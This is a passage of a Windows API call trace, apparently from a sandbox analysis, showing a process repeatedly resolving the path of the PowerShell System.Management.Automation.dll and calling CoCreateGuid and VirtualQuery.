	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x68171f5a, Data2=0xdc1b, Data3=0x4b97, Data4=([0]=0xb8, [1]=0xb4, [2]=0xec, [3]=0x67, [4]=0x39, [5]=0xd7, [6]=0x7c, [7]=0xf3))) returned 0x0
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.270] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2242af76, Data2=0x531e, Data3=0x4526, Data4=([0]=0x96, [1]=0x22, [2]=0x99, [3]=0x8a, [4]=0xf5, [5]=0xf2, [6]=0xd9, [7]=0x49))) returned 0x0
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.271] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xe5acc7f6, Data2=0x2009, Data3=0x4f69, Data4=([0]=0xa4, [1]=0xb3, [2]=0xdd, [3]=0x69, [4]=0x42, [5]=0xb4, [6]=0x9a, [7]=0x86))) returned 0x0
	[0337.272] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa4129c10, Data2=0xbbee, Data3=0x4459, Data4=([0]=0xa6, [1]=0xf3, [2]=0x5f, [3]=0xa7, [4]=0x86, [5]=0x6c, [6]=0x8f, [7]=0xc8))) returned 0x0
	[0337.272] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xb5f36d0d, Data2=0x9c06, Data3=0x49c2, Data4=([0]=0x92, [1]=0xe2, [2]=0xef, [3]=0x84, [4]=0xbe, [5]=0xd5, [6]=0xfe, [7]=0x1d))) returned 0x0
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.273] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xace98f76, Data2=0x2455, Data3=0x4f7d, Data4=([0]=0xa1, [1]=0x69, [2]=0x39, [3]=0xae, [4]=0x28, [5]=0x80, [6]=0xc6, [7]=0xc9))) returned 0x0
	[0337.273] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.273] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.273] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.273] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.274] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b700, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0337.275] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.275] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.275] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.275] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.275] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.276] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.276] VirtualQuery (in: lpAddress=0x26aff0, lpBuffer=0x26beb0, dwLength=0x30 | out: lpBuffer=0x26beb0*(BaseAddress=0x26a000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.276] VirtualQuery (in: lpAddress=0x26b080, lpBuffer=0x26bf40, dwLength=0x30 | out: lpBuffer=0x26bf40*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.276] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.276] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.277] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x251d8894, Data2=0x289a, Data3=0x4560, Data4=([0]=0xa0, [1]=0x4f, [2]=0x4b, [3]=0xe5, [4]=0x1e, [5]=0xba, [6]=0x18, [7]=0x57))) returned 0x0
	[0337.277] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0337.604] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.604] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.605] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b900, lpBuffer=0x26c7c0, dwLength=0x30 | out: lpBuffer=0x26c7c0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b990, lpBuffer=0x26c850, dwLength=0x30 | out: lpBuffer=0x26c850*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.606] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.607] VirtualQuery (in: lpAddress=0x26b8f0, lpBuffer=0x26c7b0, dwLength=0x30 | out: lpBuffer=0x26c7b0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.607] VirtualQuery (in: lpAddress=0x26b980, lpBuffer=0x26c840, dwLength=0x30 | out: lpBuffer=0x26c840*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
